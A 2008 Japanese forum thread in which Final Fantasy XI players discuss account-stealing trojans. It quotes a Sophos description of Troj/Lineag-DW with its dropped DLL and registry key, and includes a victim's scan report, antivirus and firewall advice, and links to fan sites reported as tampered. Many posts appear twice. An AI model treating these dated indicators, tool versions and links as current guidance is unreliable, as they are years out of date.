手打ちって言っても昔からではなく最近の被害でてから手打ちにしてたりが多いみたいだし
当然パス抜かれた後にWindowsUpdateとかしてもあれなわけで
836 :既にその名前は使われています:2008/08/12(火) 16:12:22 ID:WVf5oSlV
PCでプレイした後PS2でログインしてパス変えて落ちるw
そのうち復活の呪文が違いますとか言われそうで怖いことは怖い
そのうち復活の呪文が違いますとか言われそうで怖いことは怖い
837 :既にその名前は使われています:2008/08/12(火) 16:20:04 ID:gM70EMnp
838 :既にその名前は使われています:2008/08/12(火) 16:22:52 ID:R/BMTcnj
839 :既にその名前は使われています:2008/08/12(火) 16:26:33 ID:NGS22e+2
英Sophosより返答。
Troj/Lineag-DW includes functionality to access the internet and communicate with a remote server.
When first run Troj/Lineag-DW creates the file <System32>\KarnaeghDrv.dll.
The file KarnaeghDrv.dll is registered as a COM object and ShellExecute hook, creating registry entries under:
HKCR\CLSID\{DA0A0B68-2F3C-51D2-A901-938AE036D21A}
KarnaeghDrv.dll またお前か
Troj/Lineag-DW includes functionality to access the internet and communicate with a remote server.
When first run Troj/Lineag-DW creates the file <System32>\KarnaeghDrv.dll.
The file KarnaeghDrv.dll is registered as a COM object and ShellExecute hook, creating registry entries under:
HKCR\CLSID\{DA0A0B68-2F3C-51D2-A901-938AE036D21A}
KarnaeghDrv.dll またお前か
840 :既にその名前は使われています:2008/08/12(火) 16:30:24 ID:7gi2i432
>>835
ID/PASSをクライアントに記憶させないほうが良いとされているのは、保存されているファイルを盗み出す手口に対して有効だからなわけだけど。
そこを対策してない層にFlashPlayerの更新やOSを更新をしてない人が多く居たって事じゃないかなー。
出張やっと終わったわけだが、なんか新しい手法とかでてきたんだろうか。
Xrea鯖改ざんして仕込んでるみたいだけど、ドロッパ食わせるのはまたFlashPlayerの脆弱性突いてるやつかしらん?
ID/PASSをクライアントに記憶させないほうが良いとされているのは、保存されているファイルを盗み出す手口に対して有効だからなわけだけど。
そこを対策してない層にFlashPlayerの更新やOSを更新をしてない人が多く居たって事じゃないかなー。
出張やっと終わったわけだが、なんか新しい手法とかでてきたんだろうか。
Xrea鯖改ざんして仕込んでるみたいだけど、ドロッパ食わせるのはまたFlashPlayerの脆弱性突いてるやつかしらん?
841 :既にその名前は使われています:2008/08/12(火) 16:34:52 ID:cPfiN4NV
しかし、これだけ亜種が出るとアンチウイルスはほぼ意味ないな
正にいたちごっこだ、こっちは検体見つけないとダメな時点で中華優勢だな
正にいたちごっこだ、こっちは検体見つけないとダメな時点で中華優勢だな
842 :既にその名前は使われています:2008/08/12(火) 16:37:34 ID:7gi2i432
元来アンチウィルスソフトってそういうもんだよ。
だからこそファイアヲールやHIPSで挙動を絞ってやることが重要なわけでw
だからこそファイアヲールやHIPSで挙動を絞ってやることが重要なわけでw
843 :既にその名前は使われています:2008/08/12(火) 16:38:42 ID:MxQbHCid
824です。いま別キャラでログインしてとりあえずアカ停止してもらったよ〜
GMに聞いたら復旧までに1ヶ月 以 上 だそうだ・・・長いね・・・
ff関連で昨日見たサイトなんだけど、ほかに怪しいのなかったんだけど、
アバストしたらトロイがいますた。PCは使わないほうがいいのかもね。
GMに聞いたら復旧までに1ヶ月 以 上 だそうだ・・・長いね・・・
ff関連で昨日見たサイトなんだけど、ほかに怪しいのなかったんだけど、
アバストしたらトロイがいますた。PCは使わないほうがいいのかもね。
844 :既にその名前は使われています:2008/08/12(火) 16:40:13 ID:AxdPCnw5
845 :既にその名前は使われています:2008/08/12(火) 16:41:32 ID:NGS22e+2
>>840
うん。
うん。
846 :既にその名前は使われています:2008/08/12(火) 16:42:07 ID:m+cUPiBv
847 :既にその名前は使われています:2008/08/12(火) 16:45:33 ID:NGS22e+2
848 :既にその名前は使われています:2008/08/12(火) 16:46:31 ID:Su7jRKR1
ネット環境とFF11を完全に分けるしかないって状況に追い込まれそうだね。
849 :既にその名前は使われています:2008/08/12(火) 16:52:00 ID:7gi2i432
>>843
対応乙。落ち着いたらテンプレ報告と、検出された定義名、ファイル名を書き出してもらえると状況把握しやすいかなー。
>>845
そうかー、ありがとう。KarnaeghDrv.dllは複合垢パク仕様なんだねえ。
前にも何度かKarnaeghDrv.dllの報告あったし、被害にあったのにwzcsvbxm.dllが無かったって人のはやっぱりこいつなんだろうねー。
もちろん更に以前の手法でやられちゃったって可能性もあるけどw
対応乙。落ち着いたらテンプレ報告と、検出された定義名、ファイル名を書き出してもらえると状況把握しやすいかなー。
>>845
そうかー、ありがとう。KarnaeghDrv.dllは複合垢パク仕様なんだねえ。
前にも何度かKarnaeghDrv.dllの報告あったし、被害にあったのにwzcsvbxm.dllが無かったって人のはやっぱりこいつなんだろうねー。
もちろん更に以前の手法でやられちゃったって可能性もあるけどw
850 :既にその名前は使われています:2008/08/12(火) 17:02:50 ID:AZsCH7Z5
あえて情報サイトを見ないという選択
851 :既にその名前は使われています:2008/08/12(火) 17:07:34 ID:Teo+H7oX
情報サイトを開く前にURLでググッてページのデータを
丸ごとダウンロードしてネット回線切断して
落としたデータを調べてから見ればいいんじゃねーの?
丸ごとダウンロードしてネット回線切断して
落としたデータを調べてから見ればいいんじゃねーの?
852 :既にその名前は使われています:2008/08/12(火) 17:11:20 ID:Pv5GVtZw
853 :既にその名前は使われています:2008/08/12(火) 17:16:38 ID:NGS22e+2
ソースチェッカーで改ざん前のキャッシュを見て安心するのですね、わかります。
854 :既にその名前は使われています:2008/08/12(火) 17:23:34 ID:QbGE353/
あれ?ページ上部のURL入れてCHECKボタン押すのもキャッシュ検索だったのか?
うわ〜勘違いしてたんかorz・・・・
うわ〜勘違いしてたんかorz・・・・
855 :既にその名前は使われています:2008/08/12(火) 17:24:23 ID:k+v1/xjX
>>849
おかえりおつかれちゃーん
>>850-851
そもそも何か動作をさせる(掲示板に書き込む、文字が動く、音が鳴るEts・・・)のを逆手にとってアカハックに利用してるのが今回の元凶。
だから、企業のHPの方が数段危なかったりする。(この前も個人情報ぬかれまくってたしなw)
純粋な、素人がメモ書きしたHPほど安全なのだよ。
まあ、ダウンロードの意味わかってたらこんな質問出てこないけどな。
おかえりおつかれちゃーん
>>850-851
そもそも何か動作をさせる(掲示板に書き込む、文字が動く、音が鳴るEts・・・)のを逆手にとってアカハックに利用してるのが今回の元凶。
だから、企業のHPの方が数段危なかったりする。(この前も個人情報ぬかれまくってたしなw)
純粋な、素人がメモ書きしたHPほど安全なのだよ。
まあ、ダウンロードの意味わかってたらこんな質問出てこないけどな。
856 :既にその名前は使われています:2008/08/12(火) 17:25:50 ID:MxQbHCid
824です。分かるとこまででテンプレ報告。元に戻るまでミスラでも作って
あそんでるよ〜。
●気付いた日時 2008/8/12
●不審なアドレスのクリックの有無 特に思い当たらないが、よく見るのはDAT関係とか攻略サイト。
●他人が貴方のIDを使用したことが一度でもあるか(Yes/No) No
●ID・Passの認証方法(POLに保存/自動ログイン/手打ち、途中で変更した場合はその履歴、例:自動ログイン→○月○日から手打ち、等) 自動ログイン
●Pass変更の履歴(した/していない・していたならパスの最終更新日、等) 1年前
●他人が貴方のPCを使う可能性の有無(Yes/No) No
●ツールの使用の有無:Yes/No・Yesの場合はそのToolの説明 Yes Altana View, FF11 model viewer, Altana Cubby
●ネットカフェの利用の有無:Yes/No No
●使っているOS(SP等まで書く) WINDOWS XP home edition
●使用ブラウザ(バージョン等まで分かれば書く) IE SP2
●WindowsUpdateの有無(最終更新日、等) 不明。更新のお知らせが来たらする程度。
●FlashPlayerとRealPlayerのバージョン(更新日時をわかる範囲で・未導入であれば無し) RealPlayerv10.0 FlashPlayer 不明
●アンチウイルスソフト(たとえば NortonInternetSecurity2008 等の名称、及びパターン更新日)ノートン 2004
●その他のSecurty対策(Spybot S&D、ルータ、等) とくになし
あそんでるよ〜。
●気付いた日時 2008/8/12
●不審なアドレスのクリックの有無 特に思い当たらないが、よく見るのはDAT関係とか攻略サイト。
●他人が貴方のIDを使用したことが一度でもあるか(Yes/No) No
●ID・Passの認証方法(POLに保存/自動ログイン/手打ち、途中で変更した場合はその履歴、例:自動ログイン→○月○日から手打ち、等) 自動ログイン
●Pass変更の履歴(した/していない・していたならパスの最終更新日、等) 1年前
●他人が貴方のPCを使う可能性の有無(Yes/No) No
●ツールの使用の有無:Yes/No・Yesの場合はそのToolの説明 Yes Altana View, FF11 model viewer, Altana Cubby
●ネットカフェの利用の有無:Yes/No No
●使っているOS(SP等まで書く) WINDOWS XP home edition
●使用ブラウザ(バージョン等まで分かれば書く) IE SP2
●WindowsUpdateの有無(最終更新日、等) 不明。更新のお知らせが来たらする程度。
●FlashPlayerとRealPlayerのバージョン(更新日時をわかる範囲で・未導入であれば無し) RealPlayerv10.0 FlashPlayer 不明
●アンチウイルスソフト(たとえば NortonInternetSecurity2008 等の名称、及びパターン更新日)ノートン 2004
●その他のSecurty対策(Spybot S&D、ルータ、等) とくになし
857 :既にその名前は使われています:2008/08/12(火) 17:27:18 ID:MxQbHCid
つづき
●ウイルススキャン結果(たとえば カスペルスキーオンラインスキャンでC:\WINDOWS\System32\○○.DLLをTrojan.W32○○として発見 等)
DaemonTools_WhenUSave_Installer.ex Win32:Agent-AWB [Adw]
A0085077.exe Win32:Agent-AWB [Adw]
1161130908.dat Win32:Mhtplo-26 [Trj]
1152100569.dat Win32:Mhtplo-26 [Trj]
●スレログやテンプレを読んだか(Yes/No/今から読みます) 今から読みます
●hosts変更(有/無・有りの場合は最終更新は何時ごろか) ナシ
●PeerGuardian2の導入(有/無・有りの場合は参照元サイトはどこか) ナシ
●その他情報・症状など(書ききれない場合は次レスで書いてください) パスワードを勝手に変更されていた。
●ウイルススキャン結果(たとえば カスペルスキーオンラインスキャンでC:\WINDOWS\System32\○○.DLLをTrojan.W32○○として発見 等)
DaemonTools_WhenUSave_Installer.ex Win32:Agent-AWB [Adw]
A0085077.exe Win32:Agent-AWB [Adw]
1161130908.dat Win32:Mhtplo-26 [Trj]
1152100569.dat Win32:Mhtplo-26 [Trj]
●スレログやテンプレを読んだか(Yes/No/今から読みます) 今から読みます
●hosts変更(有/無・有りの場合は最終更新は何時ごろか) ナシ
●PeerGuardian2の導入(有/無・有りの場合は参照元サイトはどこか) ナシ
●その他情報・症状など(書ききれない場合は次レスで書いてください) パスワードを勝手に変更されていた。
858 :既にその名前は使われています:2008/08/12(火) 17:43:29 ID:bkms+uTk
>>857 のDaemonToolsなんたかが、COMODO Firewallでスキャンしたらかかったわ
俺も危うかった・・・・
PG2導入 SypBot Ad-Ware SpywareBlaster ノートン先生までで安心してたけど
WindowsDefender導入してなかったし、WindowsFirewallがオフってた・・・
WindowsFirewallはノートン先生と競合するからオフった記憶があるんだけど、ONにして今のところ問題ないようだ
ところで本題
COMODO Firewallを導入してる方情報をください。
POLログイン>FF開始、FFキャラ選択画面>キャラ読み込み という一連の動作で
「キャラ読み込み」だけができずにサーバー応答なしエラーで先に進めなくなってしまいました。
なにか上手い設定方法ご存知でしょうか。ご教授いただけますか?
俺も危うかった・・・・
PG2導入 SypBot Ad-Ware SpywareBlaster ノートン先生までで安心してたけど
WindowsDefender導入してなかったし、WindowsFirewallがオフってた・・・
WindowsFirewallはノートン先生と競合するからオフった記憶があるんだけど、ONにして今のところ問題ないようだ
ところで本題
COMODO Firewallを導入してる方情報をください。
POLログイン>FF開始、FFキャラ選択画面>キャラ読み込み という一連の動作で
「キャラ読み込み」だけができずにサーバー応答なしエラーで先に進めなくなってしまいました。
なにか上手い設定方法ご存知でしょうか。ご教授いただけますか?
859 :既にその名前は使われています:2008/08/12(火) 17:46:45 ID:7gi2i432
>>857
1161130908.dat Win32:Mhtplo-26 [Trj]
1152100569.dat Win32:Mhtplo-26 [Trj]
こいつらは専ブラのログかなー?
だったらログにウィルスコード貼られたやつに反応してる可能性があるかも。
DaemonTools_WhenUSave_Installer.ex Win32:Agent-AWB [Adw]
A0085077.exe Win32:Agent-AWB [Adw]
こいつだけど,DaemonToolsをPCにインスコしてたりしないかなー?
1161130908.dat Win32:Mhtplo-26 [Trj]
1152100569.dat Win32:Mhtplo-26 [Trj]
こいつらは専ブラのログかなー?
だったらログにウィルスコード貼られたやつに反応してる可能性があるかも。
DaemonTools_WhenUSave_Installer.ex Win32:Agent-AWB [Adw]
A0085077.exe Win32:Agent-AWB [Adw]
こいつだけど,DaemonToolsをPCにインスコしてたりしないかなー?
860 :既にその名前は使われています:2008/08/12(火) 17:48:14 ID:TI+p5+DZ
届いたかどうか心配するのもあれなんでコンビニからクロネコヤマトで書類送ってみた
861 :既にその名前は使われています:2008/08/12(火) 17:56:01 ID:MxQbHCid
862 :既にその名前は使われています:2008/08/12(火) 17:58:42 ID:7gi2i432
>>858
ちゃんと>>10の通りにしてる?
それで問題なくプレイできているよー。
ちなみにアプリケーションルールは上から下に適用されていくので、一番下にはAllDenyいれるの忘れずに。
それでルール外の接続は全て拒否されるよ。
ちゃんと>>10の通りにしてる?
それで問題なくプレイできているよー。
ちなみにアプリケーションルールは上から下に適用されていくので、一番下にはAllDenyいれるの忘れずに。
それでルール外の接続は全て拒否されるよ。
863 :既にその名前は使われています:2008/08/12(火) 18:07:13 ID:bkms+uTk
>>862
ありがとう。再設定して参ります。
ありがとう。再設定して参ります。
864 :既にその名前は使われています:2008/08/12(火) 18:07:30 ID:6XbwNLV3
FC2ブログやってるんだが、感染確認したので削除した。
これって俺が持ち込んじゃったのか?
それともサーバー側が汚染されてるってこと?
これって俺が持ち込んじゃったのか?
それともサーバー側が汚染されてるってこと?
865 :既にその名前は使われています:2008/08/12(火) 18:11:17 ID:qjegPAtA
866 :既にその名前は使われています:2008/08/12(火) 18:11:52 ID:7gi2i432
>>861
んじゃそれはスレ内に貼られたウィルスコードに反応してる可能性がたかいねー。
DaemonTools_WhenUSave_Installer.ex Win32:Agent-AWB [Adw]
これだけどデーモンツールだと思うんだけどな。
仮想ドライブ作るソフトいれてないかなあ?
A0085077.exe Win32:Agent-AWB [Adw]
これはよくわからないけど、定義名同じだしねえ・・・
んじゃそれはスレ内に貼られたウィルスコードに反応してる可能性がたかいねー。
DaemonTools_WhenUSave_Installer.ex Win32:Agent-AWB [Adw]
これだけどデーモンツールだと思うんだけどな。
仮想ドライブ作るソフトいれてないかなあ?
A0085077.exe Win32:Agent-AWB [Adw]
これはよくわからないけど、定義名同じだしねえ・・・
867 :既にその名前は使われています:2008/08/12(火) 18:25:52 ID:6j+llbMJ
デーモンツールは少し前のバージョンまでインストーラにアドウェア入ってるよ。
インストール時に拒否できるけど。
最近のだと入ってないはず。
ちなみにFFには関係ないアドウェア。
インストール時に拒否できるけど。
最近のだと入ってないはず。
ちなみにFFには関係ないアドウェア。
868 :既にその名前は使われています:2008/08/12(火) 18:34:45 ID:7gi2i432
869 :既にその名前は使われています:2008/08/12(火) 18:37:53 ID:6i/6tig2
>>856
●アンチウイルスソフト(たとえば NortonInternetSecurity2008 等の名称、及びパターン更新日)ノートン 2004
ノートンだとFFのパス抜きは検知できないかもしれない。
>>115のカスペオンラインスキャンした方がいいかも。
DaemonTools_WhenUSave_Installer.ex Win32:Agent-AWB [Adw]
⇒デーモンツールのアドウェア
A0085077.exe Win32:Agent-AWB [Adw]
⇒デーモンツールのアドウェア(システムの復元領域か、インストーラーの残骸か
1161130908.dat Win32:Mhtplo-26 [Trj]
1152100569.dat Win32:Mhtplo-26 [Trj]
⇒2chのログ
●アンチウイルスソフト(たとえば NortonInternetSecurity2008 等の名称、及びパターン更新日)ノートン 2004
ノートンだとFFのパス抜きは検知できないかもしれない。
>>115のカスペオンラインスキャンした方がいいかも。
DaemonTools_WhenUSave_Installer.ex Win32:Agent-AWB [Adw]
⇒デーモンツールのアドウェア
A0085077.exe Win32:Agent-AWB [Adw]
⇒デーモンツールのアドウェア(システムの復元領域か、インストーラーの残骸か
1161130908.dat Win32:Mhtplo-26 [Trj]
1152100569.dat Win32:Mhtplo-26 [Trj]
⇒2chのログ
870 :既にその名前は使われています:2008/08/12(火) 18:38:52 ID:7gi2i432
>>856
●FlashPlayerとRealPlayerのバージョン(更新日時をわかる範囲で・未導入であれば無し) RealPlayerv10.0 FlashPlayer 不明
取りあえず↓でバージョンを確認してきてねー。現在の最新バージョンは9.0.124.0でそれ以前のものは脆弱性持ち。
十中八九ここだとは思うけど、食わせる為の口は.
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
●FlashPlayerとRealPlayerのバージョン(更新日時をわかる範囲で・未導入であれば無し) RealPlayerv10.0 FlashPlayer 不明
取りあえず↓でバージョンを確認してきてねー。現在の最新バージョンは9.0.124.0でそれ以前のものは脆弱性持ち。
十中八九ここだとは思うけど、食わせる為の口は.
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
871 :既にその名前は使われています:2008/08/12(火) 18:40:20 ID:6i/6tig2
872 :既にその名前は使われています:2008/08/12(火) 18:41:25 ID:7gi2i432
>>869
ふと思ったけど、ノートン2004ってまだモジュールウpデトとかパターン更新されてんの?
ふと思ったけど、ノートン2004ってまだモジュールウpデトとかパターン更新されてんの?
873 :既にその名前は使われています:2008/08/12(火) 18:41:57 ID:6i/6tig2
874 :既にその名前は使われています:2008/08/12(火) 18:43:24 ID:cPfiN4NV
そもそも更新の金払ってるのかさえ怪しいな
875 :既にその名前は使われています:2008/08/12(火) 18:45:13 ID:BFURx5Gi
ところでノートン2004ってまだパターンファイルの更新とかあるの?
>>860
メール便?いいねぇ
知識として知っておくといいけどもし別口で郵便で送るのなら、窓口で「配達記録」でと言えば追跡かけられるようになるよ
基本運賃+210円(2008年現在)になるけどね
>>860
メール便?いいねぇ
知識として知っておくといいけどもし別口で郵便で送るのなら、窓口で「配達記録」でと言えば追跡かけられるようになるよ
基本運賃+210円(2008年現在)になるけどね
876 :既にその名前は使われています:2008/08/12(火) 18:46:37 ID:7gi2i432
とりあえず>>824 ID:MxQbHCidはミスラちゃん作って遊ぶ前に一度PCをクリンスコしたほうがいいよ。
今検出されたものは垢パクに関係なさそうだし、まだ垢パクマルウェアは絶賛活動中の可能性も高いしね。
今検出されたものは垢パクに関係なさそうだし、まだ垢パクマルウェアは絶賛活動中の可能性も高いしね。
877 :既にその名前は使われています:2008/08/12(火) 18:51:21 ID:2PuZHXex
もうノートン2004のサポート期限過ぎてるよ。
878 :既にその名前は使われています:2008/08/12(火) 19:10:26 ID:KgMAI+rd
ノートンのパターンファイルは共用だったような希ガス
879 :既にその名前は使われています:2008/08/12(火) 19:11:33 ID:6i/6tig2
>>878
それ以前にそこまで古いのを使ってるってことはパターン更新してるかどうか…
それ以前にそこまで古いのを使ってるってことはパターン更新してるかどうか…
880 :既にその名前は使われています:2008/08/12(火) 19:13:52 ID:Md2lTOOT
http://www◆veldo◆net/item_223.html
> ウイルス・・・
> http://www.geocities.jp/pehchunpm/mondai_XREA.htm
> http://sb.xrea.com/showthread.php?t=12960
> xreaが再び改竄受けてる模様。
> もうだめかもしれん・・・
> で、別にどうでもいいやん、って話なんですけど、
> 非常に言いにくいんですが、どうもこのブログも改竄受けてた模様。
> 見知られないタグ(javascriptの出力)が埋め込まれてました。
> 証拠とか見せてる問題じゃないので、即刻修正しました。
> flashが最新版の場合は別に問題ないそうですが、一応ウイルスチェックしてる途中です・・・
> 8/2以降、このブログ見た人は、一応ウイルスチェックしたほうがいいかも。「かも」じゃなくてしたほうがいいね。
> ていうかブログなんだからphp出力のはずなのに・・
> と思うかもしれませんが、見事にテンプレートが改竄受けてたみたいです。もうやだ・・・
ジョブテンプレ・マップガイド以外でも改竄されてるとこはありそうなふいんき(なぜかry
> ウイルス・・・
> http://www.geocities.jp/pehchunpm/mondai_XREA.htm
> http://sb.xrea.com/showthread.php?t=12960
> xreaが再び改竄受けてる模様。
> もうだめかもしれん・・・
> で、別にどうでもいいやん、って話なんですけど、
> 非常に言いにくいんですが、どうもこのブログも改竄受けてた模様。
> 見知られないタグ(javascriptの出力)が埋め込まれてました。
> 証拠とか見せてる問題じゃないので、即刻修正しました。
> flashが最新版の場合は別に問題ないそうですが、一応ウイルスチェックしてる途中です・・・
> 8/2以降、このブログ見た人は、一応ウイルスチェックしたほうがいいかも。「かも」じゃなくてしたほうがいいね。
> ていうかブログなんだからphp出力のはずなのに・・
> と思うかもしれませんが、見事にテンプレートが改竄受けてたみたいです。もうやだ・・・
ジョブテンプレ・マップガイド以外でも改竄されてるとこはありそうなふいんき(なぜかry
881 :既にその名前は使われています:2008/08/12(火) 19:14:16 ID:QXts6zsB
>>856-857
テンプレ乙
●FlashPlayerは必ず更新しておきましょう
十中八九最新版では無いとみたぜ
●アンチウィルスは最新版にするか、金払うのがイヤならせめてAvast!あたりいれる
サポート切れてるウィルスソフトなんて意味ナシ
●パス保存ダメ!ゼッタイ!
少なくとも以上3点やらないと新キャラのミスラもハックされて終わる
テンプレ乙
●FlashPlayerは必ず更新しておきましょう
十中八九最新版では無いとみたぜ
●アンチウィルスは最新版にするか、金払うのがイヤならせめてAvast!あたりいれる
サポート切れてるウィルスソフトなんて意味ナシ
●パス保存ダメ!ゼッタイ!
少なくとも以上3点やらないと新キャラのミスラもハックされて終わる
882 :既にその名前は使われています:2008/08/12(火) 19:18:08 ID:MxQbHCid
883 :既にその名前は使われています:2008/08/12(火) 19:19:19 ID:qjegPAtA
884 :既にその名前は使われています:2008/08/12(火) 19:20:54 ID:cPfiN4NV
885 :既にその名前は使われています:2008/08/12(火) 19:21:31 ID:KgMAI+rd
886 :既にその名前は使われています:2008/08/12(火) 19:23:29 ID:H9m9iHDf
>>882
そのバージョンは脆弱性持ちなんだよー。残念だったなあ;
垢パクウェアの最新種の状況が↓だし,現時点ではAvastも検知できないみたいだからなー。
http://www.virustotal.com/analisis/ccc234390e5b7a6c342d589bf2a33038
カスペルスキーオンラインスキャンしてきて結果貼ってくれると嬉しいかしらん。
そのバージョンは脆弱性持ちなんだよー。残念だったなあ;
垢パクウェアの最新種の状況が↓だし,現時点ではAvastも検知できないみたいだからなー。
http://www.virustotal.com/analisis/ccc234390e5b7a6c342d589bf2a33038
カスペルスキーオンラインスキャンしてきて結果貼ってくれると嬉しいかしらん。
887 :既にその名前は使われています:2008/08/12(火) 19:25:56 ID:Ogkbnhca
俺もゲームシーフに感染してたわ
カスペで削除したけど
カスペで削除したけど
888 :既にその名前は使われています:2008/08/12(火) 19:26:27 ID:RtRMH9Nl
「ウイルスセキュリティZERO」に脆弱性、スキャン不能の状態に
ttp://internet.watch.impress.co.jp/cda/news/2008/08/12/20564.html
発見された脆弱性は、ファイルのスキャン処理において、
細工された圧縮ファイルを適切に処理できないために、
DoS状態になるというもの。この脆弱性が悪用されると
スキャン処理が停止し、以降ウイルスが検知できなくなってしまうという。
ttp://internet.watch.impress.co.jp/cda/news/2008/08/12/20564.html
発見された脆弱性は、ファイルのスキャン処理において、
細工された圧縮ファイルを適切に処理できないために、
DoS状態になるというもの。この脆弱性が悪用されると
スキャン処理が停止し、以降ウイルスが検知できなくなってしまうという。
889 :既にその名前は使われています:2008/08/12(火) 19:28:41 ID:LIOX+9Uh
890 :既にその名前は使われています:2008/08/12(火) 19:49:59 ID:fz5AwyHu
>>880
そこも独自ドメインだけどxreaだの・・・
そこも独自ドメインだけどxreaだの・・・
891 :既にその名前は使われています:2008/08/12(火) 20:48:07 ID:NGS22e+2
892 :既にその名前は使われています:2008/08/12(火) 21:01:33 ID:9Hi+f4m9
ギコナビからJane Styleに変えた。
Jane Styleのサイトがxreaだった・・・
Jane Styleのサイトがxreaだった・・・
893 :既にその名前は使われています:2008/08/12(火) 21:04:39 ID:lmqu7Ut1
もう1カ所発見。形跡がないけど・・・。
http://idohorisan.so.land.to/blog/2008/08/post-4.html
> アカウントハック多いなぁ
>
> つい先日登録させてもらったFF11のリンク集サイト http://ffxiweb◆com/ にアクセスしたら
>
> 「Final Fantasy XI Web Portal」
> 罠サイトへ誘導されると思われるスクリプトが埋め込まれていたようです。
> 大変ご迷惑をおかけいたしました。
> セキュリティソフトで、私のサイトにアクセスしたパソコンをスキャンしてみましたが、なにも出てきませんでしたが、
> 念のため、アクセスされたかたは、セキュリティソフトなどでの対策をお願いいたします。
> (近日中に復旧予定です。)
> 管理人 じゅんたる
>
> となっていました。
>
> 登録された直後だったのでびっくり。。。。でもないか
> もうどのサイトでも罠スクリプトの埋め込みの脅威に晒されてるということですね。
http://idohorisan.so.land.to/blog/2008/08/post-4.html
> アカウントハック多いなぁ
>
> つい先日登録させてもらったFF11のリンク集サイト http://ffxiweb◆com/ にアクセスしたら
>
> 「Final Fantasy XI Web Portal」
> 罠サイトへ誘導されると思われるスクリプトが埋め込まれていたようです。
> 大変ご迷惑をおかけいたしました。
> セキュリティソフトで、私のサイトにアクセスしたパソコンをスキャンしてみましたが、なにも出てきませんでしたが、
> 念のため、アクセスされたかたは、セキュリティソフトなどでの対策をお願いいたします。
> (近日中に復旧予定です。)
> 管理人 じゅんたる
>
> となっていました。
>
> 登録された直後だったのでびっくり。。。。でもないか
> もうどのサイトでも罠スクリプトの埋め込みの脅威に晒されてるということですね。
894 :既にその名前は使われています:2008/08/12(火) 21:13:54 ID:iG74Gl8f
一番の対策は自動ログイン機能を廃止することじゃね。
895 :既にその名前は使われています:2008/08/12(火) 21:24:23 ID:z3hYURcI
>>894
いつの時代の話してんだ?
いつの時代の話してんだ?
896 :既にその名前は使われています:2008/08/12(火) 21:25:43 ID:Kn/MThG4
まるで理解していない・・・
897 :既にその名前は使われています:2008/08/12(火) 21:35:04 ID:minb4bI1
898 :既にその名前は使われています:2008/08/12(火) 21:40:40 ID:7k4o+Q0T
これからはDNSスプーフィングですよー。
もうサーバに関係なくやばいかも。
もうサーバに関係なくやばいかも。
899 :既にその名前は使われています:2008/08/12(火) 21:42:02 ID:9Hi+f4m9
>>897
(´;ω;`)ウッ…
(´;ω;`)ウッ…
900 :既にその名前は使われています:2008/08/12(火) 21:46:53 ID:80E9NlRL
>>894
進化しろよ
進化しろよ
901 :既にその名前は使われています:2008/08/12(火) 21:50:49 ID:RtRMH9Nl
進化するとなるとワンタイムパスワードとか固定IPによるIP決め撃ちとか
スクエニ側が頑張る方向になるのかな?
退化方面ならPS2や箱○使うと言うユーザーサイドの諦めか?
スクエニ側が頑張る方向になるのかな?
退化方面ならPS2や箱○使うと言うユーザーサイドの諦めか?
902 :既にその名前は使われています:2008/08/12(火) 21:51:18 ID:QXts6zsB
894は強制的にパスワード保存をなくすって言いたいんじゃねえの?
903 :既にその名前は使われています:2008/08/12(火) 21:54:13 ID:MDw2n0Nz
GMの中に黒幕が居るって?
904 :既にその名前は使われています:2008/08/12(火) 21:55:19 ID:RJZM05yM
FF11WIKIの過去クエの所みてたらPGが数分にわたってホンコンIPブロックしてた
やばそうだから気をつけて
やばそうだから気をつけて
905 :既にその名前は使われています:2008/08/12(火) 22:00:17 ID:RtRMH9Nl
906 :既にその名前は使われています:2008/08/12(火) 22:04:28 ID:yLwkK/qW
PG2が222■186■190■13、14、16を弾いたから何事かと思ったぜ。
カスペ日本のアップデートサーバー混雑しすぎwww
カスペ日本のアップデートサーバー混雑しすぎwww
907 :既にその名前は使われています:2008/08/12(火) 22:05:59 ID:qjegPAtA
ある意味このスレはカスペの販促スレだからなぁ
去年からの騒動で導入した人も相当数居そうだ
俺自身はNOD32だけどな。
去年からの騒動で導入した人も相当数居そうだ
俺自身はNOD32だけどな。
908 :既にその名前は使われています:2008/08/12(火) 22:09:07 ID:z3hYURcI
>>902
そうとった上でなおほとんど意味がないと言っている
そうとった上でなおほとんど意味がないと言っている
909 :既にその名前は使われています:2008/08/12(火) 22:12:33 ID:QXts6zsB
やらんよりマシだと思うけどな
この期に及んでまだ保存してる人多数って事考えると
更新をやってないとかはもうどうにもならんけど
この期に及んでまだ保存してる人多数って事考えると
更新をやってないとかはもうどうにもならんけど
910 :既にその名前は使われています:2008/08/12(火) 22:13:35 ID:q+0yzMWS
ヤマトメール便は記録も付いて封書サイズなら80円なんだぜ
911 :既にその名前は使われています:2008/08/12(火) 22:19:00 ID:AZsCH7Z5
>>906
やっぱり混雑しているのは俺だけじゃなかったかw
やっぱり混雑しているのは俺だけじゃなかったかw
912 :既にその名前は使われています:2008/08/12(火) 22:19:30 ID:0yYcUu2r
証明書は信書にあたるから気をつけてね
ttp://www.post.japanpost.jp/question/57.html
ttp://www.post.japanpost.jp/question/57.html
913 :既にその名前は使われています:2008/08/12(火) 22:23:25 ID:UAcQ24qQ
914 :既にその名前は使われています:2008/08/12(火) 22:24:59 ID:NGS22e+2
915 :既にその名前は使われています:2008/08/12(火) 22:25:55 ID:P7uZgI1e
しかし、メール便では信書は遅れない、と法で決められていた筈。
更にメール便は、以前より改善されたとはいえ配達に関するクォリティが低すぎる。
基本的になくなっても後悔しないものを送るに使う手段であろう。
だからそれでも使いたいなら自己責任だわな。貴重なアカウントを守りたいと思うなら
数百円を節約する為だけで微妙な橋を渡るべきではないと思う。
信書のガイドライン
http://www.soumu.go.jp/yusei/shinsho_guide.html
更にメール便は、以前より改善されたとはいえ配達に関するクォリティが低すぎる。
基本的になくなっても後悔しないものを送るに使う手段であろう。
だからそれでも使いたいなら自己責任だわな。貴重なアカウントを守りたいと思うなら
数百円を節約する為だけで微妙な橋を渡るべきではないと思う。
信書のガイドライン
http://www.soumu.go.jp/yusei/shinsho_guide.html
916 :既にその名前は使われています:2008/08/12(火) 22:26:13 ID:qjegPAtA
917 :既にその名前は使われています:2008/08/12(火) 22:30:47 ID:NGS22e+2
>>916
検体は送っといたよ。初代のすら対応してくれんけど(7日に送付)。
ttp://www.virustotal.com/analisis/a4850a70087d7fddf8388485db34261f
検体は送っといたよ。初代のすら対応してくれんけど(7日に送付)。
ttp://www.virustotal.com/analisis/a4850a70087d7fddf8388485db34261f
918 :既にその名前は使われています:2008/08/12(火) 22:31:52 ID:/U4qZfce
